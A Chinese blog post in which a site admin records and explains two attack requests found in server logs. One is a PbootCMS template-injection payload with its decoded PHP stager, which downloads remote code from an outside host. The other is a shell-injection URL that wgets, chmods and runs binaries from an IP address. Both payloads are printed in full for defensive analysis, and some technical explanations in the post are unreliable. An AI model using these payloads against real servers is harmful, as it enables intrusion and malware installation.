GAMESH

游戏美术动画unity资源搬运工!

剧情党,完美控!
桐崎千棘
当前位置:首页 > 其他 > 正文内容

记录一次web攻击

admin2个月前 (08-07)其他91036

查看后台日志发现一段恶意攻击---》134.122.184.11 - - [07/Aug/2024:08:21:09 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22temp.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCcuL2NvcmUvYmFzaWMvZnVuLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kLnNvZ291YWQudmlwL3R4dC9vdGUudHh0JykpOwplY2hvICd0ZW1wMTExODg4JzsKdW5saW5rKF9fRklMRV9fKTs=\x22)))}{/pboot:if}/../../?p=14 HTTP/1.1" 301 162 "http://n666888.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"


这段内容看起来是一段服务器访问日志的记录。其中包含了访问者的 IP 地址(134.122.184.11)、访问时间(2024 年 8 月 7 日 8 时 21 分 09 秒)、请求方式(GET)、请求的路径(/ {...} /../../?p=14)、HTTP 协议版本(1.1)、返回的状态码(301)、传输的数据量(162 字节)、来源网址(n666888)以及用户代理(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36)。


需要注意的是,请求路径中的一些代码部分看起来像是恶意或可疑的操作,可能存在安全风险。例如,其中的“file_put_contents”和“base64_decode”等函数的使用方式不太正常。

请求行

  • 方法: GET

  • URL: /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22temp.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCcuL2NvcmUvYmFzaWMvZnVuLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kLnNvZ291YWQudmlwL3R4dD9vdGUudHh0JykpOwplY2hvICd0ZW1wMTExODg4JzsKdW5saW5rKF9fRklMRV9fKTs=\x22)))}{/pboot:if}/../../?p=14

    • 这部分URL经过精心构造,尝试绕过安全过滤和检查。它使用了{pboot:if(...)}{/pboot:if}这样的结构,可能是在尝试利用某个CMS(如PbootCMS)的模板注入漏洞。

    • \x22是十六进制表示的引号("),用于绕过某些检测机制。

    • file_put_contentsbase64_decode函数被用于在服务器上写入文件(temp.php),这个文件的内容是经过Base64编码的PHP代码。

    • 解码后的PHP代码大致如下:

<?php  
file_put_contents('./core/basic/fun.php', file_get_contents('http://d.sogouad.vip/txt/ote.txt'));  
echo 'temp11888';  
unlink(__FILE__);



    • 这段代码尝试从远程URL(http://d.sogouad.vip/txt/ote.txt)下载内容并保存到服务器上的./core/basic/fun.php文件,然后删除自身(unlink(__FILE__);)。

  • HTTP版本: HTTP/1.1

状态行

  • 状态码: 301

    • 这通常表示请求的资源已永久移动到新位置,但在这种情况下,它可能是服务器对非法请求的默认响应,或者是服务器配置导致的重定向。

  • 响应大小: 162 字节

  • 引用页: http://n666888.com

用户代理

  • 用户代理字符串: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

    • 这是一个模拟Chrome浏览器的用户代理字符串,用于伪装正常用户的浏览器访问。

第二个攻击-----》185.224.128.83 - - [07/Aug/2024:08:27:24 +0800] "GET /shell?cd+/tmp;rm+earm+earm5+earm7;nohup+wget+http:/\x5C/154.216.20.232/earm7;chmod+777+earm7;./earm7+jaws;nohup+wget+http:/\x5C/154.216.20.232/earm5;chmod+777+earm5;./earm5+jaws;nohup+wget+http:/\x5C/154.216.20.232/earm;chmod+777+earm;./earm+jaws HTTP/1.1" 301 162 "-" "KrebsOnSecurity"

这条日志记录了一个尝试通过HTTP GET请求在服务器上执行恶意命令的尝试。然而,需要注意的是,HTTP GET请求本身并不支持在服务器上执行命令;这里的尝试似乎是对Web服务器的一个误解或滥用。不过,从URL的结构和内容来看,攻击者显然在尝试利用某个Web应用程序的漏洞来执行一系列恶意操作。

以下是对URL中尝试执行的操作的解析:

  1. 尝试删除文件:cd+/tmp;rm+earm+earm5+earm7

    • 这部分尝试切换到/tmp目录(但cd命令后应有空格分隔,这里可能是格式错误或尝试绕过检测),然后删除名为earmearm5earm7的文件。但由于+通常不被shell用作命令分隔符(而是空格或;),且URL编码可能不正确(\x5C是反斜杠\的十六进制表示,但在URL中应直接写为/),因此这部分可能不会按预期执行。

  2. 下载并执行恶意文件:

    • nohup+wget+http:/\x5C/154.216.20.232/earm7;chmod+777+earm7;./earm7+jaws

    • 这部分尝试使用wget命令从http://154.216.20.232/(注意URL中的\x5C应该是/的误用)下载名为earm7的文件,然后将其权限更改为777(即允许所有用户读写执行),最后尝试执行该文件并传递参数jaws

    • 类似的操作还尝试下载并执行earm5earm文件。

  3. 状态码和响应大小:

    • 状态码301表示请求的资源已永久移动到新位置,这通常不是由执行恶意命令导致的,而更可能是服务器配置或Web应用程序的默认响应。

    • 响应大小162字节可能表示服务器返回的响应体的大小,而不是实际执行的命令的结果。

  4. 引用页和用户代理:

    • 引用页为"-",表示没有提供引用页信息。

    • 用户代理为KrebsOnSecurity,这很可能是一个伪造的用户代理字符串,用于伪装身份或绕过某些检测机制。实际上,KrebsOnSecurity是一个知名的网络安全博客,其名称被滥用在这里。


扫描二维码推送至手机访问。

本サイト上に掲載の文章、画像、写真などを無断で複製することは法律で禁じられています。全ての著作権はGAMESHに帰属します。

本文链接:https://pylblog.com/post/261.html

分享给朋友:
返回列表

上一篇:LEDE编译出错recipe for target 'install' failed

没有最新的文章了...

相关文章

最终幻想15王者之剑-现实与CG完美融合

最终幻想15王者之剑-现实与CG完美融合

这周三我满怀期待的看完了最终幻想15王者之剑,作为一个FF脑残粉,不论游戏还是电影我都非追不可!ff15电影已经出了不久了,但是由于工作原因一直没机会去看,这周总算是看到了!还是SE一贯的作风,画面吊...

使用iis搭建PHP报错HTTP 错误 500.0 - Internal Server Error 发生未知 FastCGI 错误

使用iis搭建PHP报错HTTP 错误 500.0 - Internal Server Error 发生未知 FastCGI 错误

使用平板电脑搭建php服务器时遇到HTTP 错误 500.0 - Internal Server Error发生未知 FastCGI 错误详细错误信息:模块   Fast...

关于原力做的网易的镇魔曲CG

关于原力做的网易的镇魔曲CG

这部cg是网易外包给原力动画的,总体来说还是不错!只是还有些小缺点,比如老头儿的胡须和头发飘动幅度一样,这肯定胡须和头发柔软度不一样嘛!有的东西采用的超写实,有的地方又比较普通,老头和那两个女孩,感觉...

尼尔 机械军团

尼尔 机械军团

记得首次看到这个游戏是在去年E3,当时这款游戏就给我留下了很深的印象,今年e3它再次亮相并且再一次成功博得我的眼球!目前公布了一段新的预告,伴随着粉丝们熟悉的异域风情原声,视频展示了游戏中各色各样的场...

SE啊!你这是歧视wiiu吗?

SE啊!你这是歧视wiiu吗?

今天在square-enix官网上无意看到了http://dlgames.square-enix.com/jp/vc/2016/ff5a/  这个页面,这是se在4月发售的一款wiiu游戏,...

路由器植入广告教程

路由器植入广告教程

 以前发过一篇利用privoxy植入js代码的教程,这种方式有很多缺点!首先配置很麻烦,不利于初学者上手,其次privoxy配置需求对于路由器还是要求有些高!经过摸索我发现了一种更容易上手的...

评论列表

游客
3周前 (09-12)

十分赞同楼主!

指尖网
3周前 (09-13)

网页的加载速度非常快,不会影响用户体验。

游客
3周前 (09-16)

强,我和我的小伙伴们都惊呆了!

游客
2周前 (09-18)

楼主内心很强大!

游客
2周前 (09-24)

林子大了,什么鸟都有了啊!

游客
10小时前

看了这么多帖子,第一次看到这么高质量内容!

发表评论

访客

看不清,换一张

QQ登录
◎欢迎参与讨论,请在这里发表您的看法和观点。